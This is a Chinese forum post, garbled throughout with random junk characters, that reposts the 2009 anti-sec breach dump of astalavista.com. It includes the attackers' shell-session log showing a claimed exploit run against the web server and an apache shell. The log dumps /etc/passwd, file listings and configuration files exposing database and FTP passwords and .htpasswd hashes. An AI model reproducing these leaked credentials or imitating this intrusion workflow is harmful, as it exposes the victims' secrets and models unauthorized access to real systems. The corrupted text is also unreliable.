里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。" S* [1 B" o/ T& ]" G
( |. W! w0 ]% d
[root@front3 ~]# curl -I litespeedtech.com% G) _& X7 P5 D) ]
HTTP/1.1 200 OK; A8 O7 G* {6 U C2 X* J
Date: Fri, 05 Jun 2009 22:54:51 GMT, i. u% t6 t3 z( d1 {( a
Server: LiteSpeed
2 m+ w; c; L, E( ^+ p/ l6 M: A
' e$ M- X+ p% L! ?另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-0 |4 O# |" j, G5 w8 d% n2 o
% E/ U& K( `! k- P# U- P
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
4 c% l& M7 ?: v* U
2 Q) O0 z& y0 [3 |, B" I8 V/ C7 e4 S# f; v3 N
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ / n! Y1 |5 k. S2 |
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \! [# G7 p4 O0 {/ {' h5 d; X
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
, K) ~* G% V" Y1 ?) B\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /' j& g4 [( V, {8 S& l! |; x8 }
\/ \/ \/ \/ \/ \/ \/
7 H* b, O, o" g0 ?% A The Hacking & Security Community; G" f4 Y( a6 K* _
[+] Founded in 1997 by a hacker computer enthusiast7 M' y7 r h; _- t+ S8 n
[-] Exposed in 2009 by anti-sec group
# Q' A8 L' x* B& a# W
' E5 E8 ]! K! S4 [0 r: nFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:% |8 g9 t; H E) R
>> 03. Who’s behind the site?
9 w P7 p" g+ E>>
& }3 j& b' {" J! K3 g& z4 K- U7 J>> A team of security and IT professionals, and a countless number of contributors from all over the world.
0 _$ K n. a0 ^7 [: b5 |6 _5 v( }
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
' _/ b3 L3 H* k# P7 s3 k. f>>
% \) N2 S0 y8 B |& ?" U* C- r>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and6 o& U6 x/ B3 o3 r5 e& m$ f, E
military institutions.
6 L: Z4 Y1 H: P2 p>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
% ?/ f% L8 _6 e' Z$ j; t
+ x2 e: u$ k. O; wWhy has Astalavista been targeted?
; L9 k1 t7 c' z/ g$ c; W$ S6 G/ }& W( }
Other than the fact that they are not doing any of this for the “community” but
! S0 [9 P. V7 X6 d* yfor the money, they spread exploits for kids, claim to be a security community7 E: U- M% @( l& Z- V; f
(with no real sense of security on their own servers), and they charge you $6.667 _0 D0 X3 T; k: q/ s% M
per months to access a dead forum with a directory filled with public releases
! g9 w3 |3 \4 v5 u2 Aand outdated / broken services.
4 k7 D1 _4 L$ [& ^4 U% j# U* i7 X+ d) f F- y1 U7 }$ v* w% c: h4 s% Y
We wanted to see how good that “team of security and IT professionals” really is.
9 C/ {: s% `, m& h/ \' z" ?3 q* `$ k5 g) s
Let’s begin.
( l7 o& R R! z1 R) V! K9 w8 i, O* U3 y* p
anti-sec:~# ./g0tshell astalavista.com -p 80( T, a {9 n4 u3 L' t
[+] Connecting to astalavista.com:80) {. i7 O) x6 ^. B+ {, q! p
[+] Grabbing banner…, ~1 e( {3 Y! k: O5 u7 Y, p
LiteSpeed
+ f! q* S; s* H4 [7 Y( B9 B[+] Injecting shellcode…
* q. d5 p9 [% l6 B3 x5 |[-] Wait for it
! X8 W1 G7 v* p1 h7 c( w1 O! c, d" C& e; W6 \% [9 f
[~] We g0tshell* j6 H+ d) a6 ?2 Q7 L" A
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux j: m# d* {7 C8 R8 l& G: H. \+ k; f
ID: uid=100(apache) gid=500(apache) groups=500(apache)
- @5 ]% H* b( M1 |) {; W2 C- \7 m# G
9 V* g( @0 D* T# e6 C" Bsh-3.2$ cat /etc/passwd+ _" T5 t. ]. v6 b- ~4 s
root:x:0:0:root:/root:/bin/bash; v9 Q# ]2 D9 K8 W9 R/ _- v
bin:x:1:1:bin:/bin:/sbin/nologin
4 |1 T2 R4 g! B- F( `daemon:x:2:2:daemon:/sbin:/sbin/nologin" u) Z3 N1 e! x1 m; G/ _6 ?7 x) }
adm:x:3:4:adm:/var/adm:/sbin/nologin
- z# X. j. _ t& ~' ~lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
Z, P. t+ ^2 S1 Psync:x:5:0:sync:/sbin:/bin/sync, C8 }1 O. N) S- j$ S& R, \
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown2 _9 X) e1 D1 O* r$ D+ V7 Y
halt:x:7:0:halt:/sbin:/sbin/halt( ]& ?# T2 |1 d
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
5 T4 \1 z# `6 O; F. t. H2 [news:x:9:13:news:/etc/news:
( E3 j/ {& E# Z% ]! Uuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
! f9 k# h$ n* eoperator:x:11:0 perator:/root:/sbin/nologin$ p: I4 P: k, K* g3 Y
games:x:12:100:games:/usr/games:/sbin/nologin' K7 L+ H( L* ]% f5 e6 ?# v
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
' r6 q* a7 r: R8 K3 }; M( rftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
3 u' l1 ^+ N: @, }& T& P0 Snobody:x:99:99:Nobody:/:/sbin/nologin) @/ X7 Y; c- ], `9 u) i, Q
rpm:x:37:37::/var/lib/rpm:/sbin/nologin( d6 i" n2 T2 Y8 b
dbus:x:81:81:System message bus:/:/sbin/nologin+ |5 a4 B) C2 m
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin- P+ u1 c! i) @; O
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin# \3 x! w: j' {, r+ r# Z$ x
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
( T8 h u% d2 j, E. Y. |7 U7 ~vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
R1 @, x% I4 Nhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- e! K9 ~. m8 f% p2 Brpc:x:32:32 ortmapper RPC user:/:/sbin/nologin0 c$ K0 I. D8 S; d& g% q& a- M
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
w# ^( b7 P: J$ s- I8 j! [, unfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
1 m7 _4 M5 V7 N) I7 t( Isshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin0 R: m+ J& E# G8 ~8 y: K6 S% Q
pcap:x:77:77::/var/arpwatch:/sbin/nologin
1 I" }* m7 C( u5 ~$ K- rnamed:x:25:25:Named:/var/named:/sbin/nologin
) o9 Y8 Y5 p2 r& p2 lapache:x:100:500::/var/www:/bin/false
) H$ z3 \8 j" p+ I4 v, e+ odiradmin:x:101:101::/usr/local/directadmin:/bin/bash
6 d: V# [9 V2 b. E0 Qmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash( o/ }5 {* g5 e
webapps:x:500:501::/var/www/html:/bin/bash8 Z' A* o! @; `! |* U: q
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash) g+ {5 s- n n" @" ?
admin:x:501:502::/home/admin:/bin/bash& t: z& e* E$ o, k
jon:x:502:503::/home/jon:/bin/bash% L* }' H2 O Q5 ~1 K# f
com:x:503:504::/home/com:/bin/bash. l# {! V: n7 B8 G% s N5 `! v1 K
ntp:x:38:38::/etc/ntp:/sbin/nologin
: _! p+ n: u7 @, n5 ?ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin5 J6 c) }/ [: y1 W; A
astanet:x:504:505::/home/astanet:/bin/bash
. I: q0 J( p+ Y! r6 Navahi:x:70:70:Avahi daemon:/:/sbin/nologin
0 o$ Y7 Z, J! J1 Bavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin4 d I, m0 l* S+ [+ ^. D" `/ _. M
% O0 s h. H* G9 Y" r/ J3 Ssh-3.2$ cat /etc/hosts
+ ]+ s, n2 D6 _ s+ M# Do not remove the following line, or various programs
. C* O9 z5 v, k( r! [" `+ C0 a# that require network functionality will fail.3 W4 U) A, b( F. t1 O5 y# U
127.0.0.1 localhost.localdomain localhost
% p( L" [) x; u7 Y3 f# D::1 localhost6.localdomain6 localhost6, Z' Z4 e- Y, S( V! B5 n# j) f- B
80.74.154.172 asta1.astalavistaserver.com
9 X- ^( |) ?! b: M) o1 I3 {9 D, k( @/ v
sh-3.2$ pwd
$ d' Q7 h0 `, y, U7 a/home/com/public_html, a' ]0 s- g1 h) v2 u4 t5 j
+ S; U _5 j: w7 p( `0 g1 Y
sh-3.2$ ls -la8 J( k6 `8 l- W3 b0 \/ E$ d
total 18460
# p( l% I8 c$ i) h- g$ P2 ^drwxr-xr-x 30 com apache 4096 May 28 17:06 .
/ _# D6 r* z7 w2 r4 ~+ x+ p4 I' U/ ndrwx–x–x 11 com com 4096 Jun 25 2008 ..
: S6 U( M4 b+ m. Xdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
& ^; O6 G, @( `8 Z' a5 udrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache- U. M0 I6 {: F$ a8 J2 M3 M) V* z# q
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin8 O7 g; A# s" D
drwxrwxrwx 2 com com 4096 May 19 00:50 config
9 [5 w/ ]3 v" g! [! B* Z, Wdrwxr-xr-x 2 com com 4096 Mar 20 11:05 core
% _' U, {# u, Hdrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
. W6 v& c5 i; ?/ k* Jdrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
, a6 [! H% W5 ?0 {* idrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
$ D5 }/ ~; K, w$ \drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
! P2 h2 y6 k1 d# C# c: D" W-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php8 ~: N! M2 d+ J$ X0 F- U6 L- u
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd6 M2 a1 Q* c' b5 f
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor& h9 ]/ f. ]+ M% |4 Y/ R- X
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico3 a0 S. z$ ^4 `; F0 x8 y
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed5 Y: O8 `4 x f ?. A4 c" d
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess/ j! c! ?) [% O* n7 E/ C) m
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
- I5 I* H" `/ K. T0 n/ G; ~-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
3 z/ f7 c6 V. L5 F( Hdrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool4 K' ]' n/ k+ w( [) R Z C
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images4 [8 u: _# Z& V9 O/ N
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php- \. E, O6 V& |- B; I1 ?
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer4 i$ q0 `% o/ E# ]
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang# N2 t2 F( @- F5 G/ F# D4 K
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib. {) Y- N% V: d* H* l
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
$ X& z, B' u2 d% l, Gdrwxr-xr-x 8 com com 4096 May 11 12:48 modifications
& w' L1 h0 F3 zdrwxr-xr-x 34 com com 4096 May 28 16:30 modules1 Y$ g- ?4 ^, q0 @9 ?" N
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
2 {2 ]3 P9 b* u+ H4 r9 h' |' O ~' Ldrwxrwxr-x 22 com com 4096 May 28 17:06 _new
4 e) F M8 [6 n) H' v* vdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
5 J% y+ ~& y) ^/ Gdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy: g! N0 ?" r& F1 @( v
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy. G4 `! J9 w1 ^0 j
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt( ]* V0 d1 n7 I; j2 y) k, k
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
4 e/ @/ O. ~. `' H1 y; \ C9 S3 G& H- _-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
" _" X$ `2 s3 s: v8 |& g0 Edrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
) i8 Q# ]0 E4 }5 p( n8 ^: Ddrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
: D' W" t( L# udrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam2 g' j$ t% t+ `1 Z
5 ?8 M! \. f; L T6 ?sh-3.2$ head -20 index.php
/ A8 y! _7 j% `' |/ D<?php& c8 J! Q% m: \. p' m8 P4 c
, P4 H% L; X( ~; i: b; J
/**; P0 k2 x z* N1 l! a
* The main page for the CMS0 O6 V( t. X" j
* @copyright CONTREXX CMS - COMVATION AG
% A+ m* S0 ~& ~1 k5 }' b8 m* @author Comvation Development Team+ \( Q# P! _1 K$ o4 ?1 S
* @version v1.0.9.10.1 stable- i+ W( B' R; V/ `% E+ x/ c
* @package contrexx# Y4 {% v/ }, m- W6 U1 w3 G5 S
* @subpackage core
8 m* M }3 H8 [/ M# y* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
J) h/ j6 X8 N8 q4 @9 q. v) z* @since v0.0.0.0
3 D3 e/ `3 w% m4 R* @todo Capitalize all class names in project/ F0 h/ U' p! ~7 b. b% }
* @uses /config/configuration.php
7 N$ d1 u* Z! R9 s+ K* @uses /config/settings.php6 p0 R! s1 C8 p: d2 w b
* @uses /config/version.php/ G# N5 z2 i5 F5 y+ J4 A
* @uses /core/API.php
, v/ T" {7 }5 J2 }# \' @% n* @uses /core_modules/cache/index.class.php
3 K9 T: I* i" E8 `+ G/ y* @uses /core/error.class.php
* G- a: I0 F6 w% ]: n* @uses /core_modules/banner/index.class.php
, {* p; u( A4 F% N1 Y6 ?8 k* @uses /core_modules/contact/index.class.php$ q+ p) @" p3 O0 _
* [+ E+ P; ]8 i6 c3 l! j6 R& t% psh-3.2$ cd config/
3 `6 t3 l) p [7 [9 Z: w4 K& xsh-3.2$ ls -la. n3 G1 W1 o7 o0 z6 v3 o' |
total 32
, h, \+ T! N* fdrwxrwxrwx 2 com com 4096 May 19 00:50 .6 g4 A0 @8 k: s
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
: E2 V" j8 s; V4 @, ^-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php5 }; x) I2 d/ s/ _4 w
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php2 x9 p) v1 W+ c$ d6 \
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php1 J# I; j% K4 ^" P2 C
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
- V+ {8 [- `" H
& w$ t+ n8 a0 [7 S0 [8 x# rsh-3.2$ cat configuration.php
) F& d; }7 ?8 x7 Q[snip]
5 k' E8 z5 \# I s/ g4 W2 i9 R+ v$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost& Q/ q6 f' W# Q4 f/ L: N u
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name/ z" `% W: M; a% d
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix0 ?; ~/ n- @: E7 ^* \
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username; f" Z' k8 g- l
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password8 m3 ^ v" W' ?6 a2 ?. v5 L% {' ?6 j
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
: T. Z9 B# L _" J' w$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
; I" r6 |& L' y5 O( y[snip]7 T* F7 J6 l/ c/ _
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false, @) O7 L" a' U
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
8 r" c0 d' s3 A, n$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost' G: d( p7 j/ K& h
$_FTPCONFIG['port'] = 21; // Ftp remote port9 p! S2 m! C5 Q: `( N
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username- c& e+ i7 z4 r- N+ [1 x# u2 a$ W
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password. R# A+ {' s( C$ Y4 z
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
0 \9 q8 m1 v2 S6 H: c, Q
; H& e1 t7 \8 k3 \" @sh-3.2$ cd ..0 k$ [3 {7 f8 S# ?
sh-3.2$ cd dvd/
2 Y0 k7 d7 _, ~9 \% I3 x# ]sh-3.2$ ls -la! s3 ]5 w. a5 ^
total 2913780& p4 H" U9 e' e! O" ~; M0 }
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
* d. }# z9 y7 X1 c* jdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
; X- ^- c5 M, M6 A8 @-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar8 [: m# i" Y* \
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
7 w4 `: [; G% ?0 q-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
# X$ c9 ]" }9 i- ^-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
9 Q# z9 R, Y# T5 \* Y* P J7 J- c4 a( u$ e# R$ y" @
sh-3.2$ cat .htaccess
/ Z- V2 N( Y( c: l" }authType Basic1 o- v) M) L8 f) q
authName DVD' A. L/ @* E7 t" c/ l
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd. n% b) J+ P+ A
require valid-user& J ~+ ~4 R5 K! O
9 h; I, |6 I5 e! U7 k
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd$ v( u7 s+ E! C* ?! T
DVDdownload:CRD8cuY6.MPT6" T# y3 `8 m/ O1 [
DVDdownload2:CR8a36.wluFMg
) ]2 u) g2 r- l7 Q! U7 g+ E
% f: ^8 R0 a7 t, Y. j: ush-3.2$ cat test.php1 r B# m8 d' E% E
<?php
2 ]$ P$ `9 k9 @! O: _8 I! y$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;9 g3 r) m* |- V7 [" d9 i I
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
1 _+ c2 L8 H# H8 e9 }3 ^$ mecho $url;
& g0 Y: P% M! d; ?3 }?>0 Q! k& o* t6 H7 k1 m( @) a
. x9 P2 Z3 B& f, _sh-3.2$ cd modifications/
1 k& U! A3 e; A3 v" z- _, \7 hsh-3.2$ ls -la
7 @7 y5 j0 F6 J$ Ntotal 32
+ ?7 H% w# w' W2 T% L- fdrwxr-xr-x 8 com com 4096 May 11 12:48 .
" Q, V# c) q+ ]" o, |: cdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
" U/ V. u+ C8 c. ~3 ~% Y0 Ddrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
& u* }# S9 X' x8 d4 x' }drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
+ Z7 i" K% p2 F- i7 A9 h1 Jdrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
1 H7 e) I1 e( N9 A3 K! q6 z. N7 y+ ~drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
5 Q& b6 P3 F! J* p+ P' {$ Zdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search& o$ R4 a# v2 s
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp1 `, l, ~; f+ n+ u$ Z4 \$ L
r; f0 I$ w9 P' R7 ?4 {: X
sh-3.2$ ls -R% X/ ^' ?4 ~. `" g! _
.:
3 Z( M* ^+ P( q1 [com_avtng cronjobs onlinetools pjirc search _tmp4 E) G3 G9 v. `3 A% _3 V
$ F' E2 y- h7 a# R, G& g2 _' ]./com_avtng:5 H% o" g$ M9 e2 o1 R8 ^
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts x9 I- u) J2 C1 T' }
1 @$ q1 t {8 \2 {
./com_avtng/scripts:
9 l8 u* R" X! x3 N& Z- i- jpopunder.js
+ d: }1 B4 {5 [; x2 x& |" R7 {6 s% E @3 o l3 o8 M! Y [4 I- Y
./cronjobs:4 j2 |$ t8 a* v' E1 n" @+ | J" [0 y
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
/ F- \/ U$ x' w4 ~; L0 A1 a5 M) [( a$ f9 c+ I. x% e9 H
./cronjobs/tmp:/ U! w. Z3 n4 w1 v: K7 L
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv8 X' S6 b( [; m$ r
% I+ j1 T: f$ M+ B./onlinetools:# l4 L8 x+ E& r% ~8 F" ~! v
index.php D; y% I: @1 a; Z0 Z; `
) p) ]2 V/ J- J
./pjirc:/ k) I' M- c0 n. d& H# i2 A
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
! V _$ L# |, j9 Y' nAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt3 ~$ ?7 S* P) X. x @
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd8 J/ P0 A5 }: v+ `" j: ?6 l# e
( D! y: \% F+ P. ~) u./pjirc/img:
/ a6 R) F N6 ? ^6 n7 Oange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
% u" \( g% j! M& u, D( H# rarbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
+ I/ a8 U2 R8 ]4 ~: O: bverre-eau.gif. K4 Z+ H) g( ]2 f1 H" W8 q: B4 }# |
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif % Q8 y1 ]3 m. X
verre-vin.gif; w5 E! d, q* m* @
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif4 A$ _6 N( S8 D( p1 o* I
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
3 L# o6 V' ]. l+ [1 l
4 A& G6 j, i/ G, d* \4 t6 f% L./pjirc/snd:
: G' X/ T$ M1 Q+ T* O2 t# h5 Vbell2.au ding.au/ {) u0 e/ F' O% f6 P3 K; X& z
& W9 {: {/ P3 s4 J./search:
0 x& f# j0 @- `* Z3 ~# x; MsearchEngines.php search.php( M+ M2 ^# D( P0 V/ N6 F* I
5 Y) a: Q. q+ [6 s./_tmp:
$ T( O, G( S% }defaultPorts.php defaultPorts.txt
3 n/ F( s* _! l/ p1 I" L& G' q. r0 P" u+ ? P
sh-3.2$ cd cronjobs/& q" M# `0 F( V" d5 f
sh-3.2$ cat exploits.php
' n: z( Z, F# V. I; @/ D[snip]) d! p* B0 I ^: E& t
$categories = array();( \% Q8 [& f3 q6 Q
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
+ \; G' R8 S' Z, O$expolits = file($milw0rmFile);- ^- L: x+ D C3 Q! m* k
$comExploits = array();; T' H' M. G0 s7 O- l$ ?
[snip]! z( s" k; n4 z
// manage data4 n# @; O/ c- j' D1 h) V( p
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640" z% ~% Q" ~5 v- G6 u+ m; |! S5 U
2 ~: A" n/ i' b // get path and title
( `. n L1 K3 V8 e $expolits[$x] = trim($expolits[$x]);
1 w3 ^$ E! g+ j+ Y8 d; b $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));4 K0 p9 U; j: |
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);: t5 E: G7 b8 ?0 i5 }8 @+ G$ k
$ P/ i( H2 i" A0 g* ?
// check if file exists. P1 l G- E* r" r& i8 B) V
if (file_exists($path)) {
$ ]1 ?8 i) W, m, K- y; F/ T& p% C+ p: h7 {4 _7 h; Q) W; F
$text = file_get_contents($path);2 t+ O( t+ \5 F/ t$ x
: F, u5 O3 X! v
// get content and date
' _" c; G9 X* N; d' S; ^% { //$text = htmlspecialchars($text, ENT_QUOTES);# l( H* ^ F: {' {
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
& I! {& _' h# ^! M$ L if ($tmptext != ”) {# n ~$ y' a/ a- z
$text = $tmptext;
. k$ Z$ X" n( c$ p4 G, ?4 `6 Y1 i } else {
, {7 D* z3 U7 w& H. g2 i N' ` $text = addslashes(htmlentities($text, ENT_QUOTES));; } @/ B* C' M/ x' T. T
}
( Y3 r2 Z5 W2 p& q: x, U$ X $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
# L+ Y# W; Y3 o1 q& I% X: [ $tmp = explode('-', $date);
/ C% ^! N6 V* [ N: U, K1 h5 ?& A6 t $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
4 R, X( l8 H: P5 F/ |; N* E $cat = getCategory ($path);
# ]3 ?& Z% f5 ?6 R* l4 M B6 ` $ext = pathinfo(basename($path));. M$ j# E. K" G0 E% m
$ext = $ext['extension'];1 j4 Y3 E) T+ l) | a4 b
$qStr = ”! G: X6 ~: `4 I/ A+ ~
SELECT `id`7 D' g1 m% r; k" f6 o5 ^
FROM `contrexx_module_exploits`( a, N! ~3 J8 i( A7 _$ `
WHERE `title` = ‘” . $title . “‘' G" Z5 e! E7 i! u J. i
AND `date` = ‘” . $date . “‘0 z' T' U2 d+ [' J* O( o; i& q
“;
\' }8 E; o. U6 \6 m. h: X$ I5 i echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
, _$ j/ a+ a9 c' X, Y $q = $_objDB->query($qStr);
5 n, G$ z. ?% g7 x
; f+ s$ C% |: o. \! j8 y if ($q->numRows() == 0) {3 F' B& Z3 Z) `0 m, [6 R6 c: R6 V# Q+ q( }
/ v+ @ s' N0 _/ E$ a // prepare array
$ o7 b* H) Y# q( p7 L2 j! Y $comExploits[$x]['date'] = $date;
8 W+ M0 Y4 |' l+ D$ F $comExploits[$x]['title'] = $title;* F. Y6 r: P Z* l
$comExploits[$x]['author'] = ‘milw0rm’;
) I; K: S8 F) E6 `. u7 Y- w6 { $comExploits[$x]['text'] = $text; {2 R7 f- j* N0 t3 l6 ?0 p
$comExploits[$x]['source'] = $ext;+ z9 a( Q: p% C. ~' y
$comExploits[$x]['url1'] = ”;8 N5 b, i! G3 J9 E+ X$ ?
$comExploits[$x]['url2'] = ”;& {0 u7 s! P' W* Z% `
$comExploits[$x]['catid'] = $cat;) z" L+ y( g' g
$comExploits[$x]['lang'] = ‘2′;& }5 e2 J) B! S$ r
$comExploits[$x]['userid'] = ‘12′;
0 @2 j8 ?# h, w! x* c $comExploits[$x]['startdate'] = ‘0000-00-00′;0 B7 s* i, v- j& t" m" t' F
$comExploits[$x]['enddate'] = ‘0000-00-00′;3 }9 b8 c! o* W9 y
$comExploits[$x]['status'] = ‘1′;1 l# A' A! j5 N; c: ?3 A
$comExploits[$x]['changelog'] = $date;
/ Z8 ~2 B; e9 V
" \5 L7 i3 l1 e. f: g3 e" { }
e% t6 _1 N D# K% Y7 o[snip]
5 r/ M0 N8 C) I# i! @5 n $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
L0 }. t9 e! _' W. S( I9 }* b<rss version=”2.0″>
7 F) X- g( n, s9 S <channel>
9 k' P" A" h( b <title>ASTALAVISTA.com - Exploits</title>2 d, c, o# v8 ~
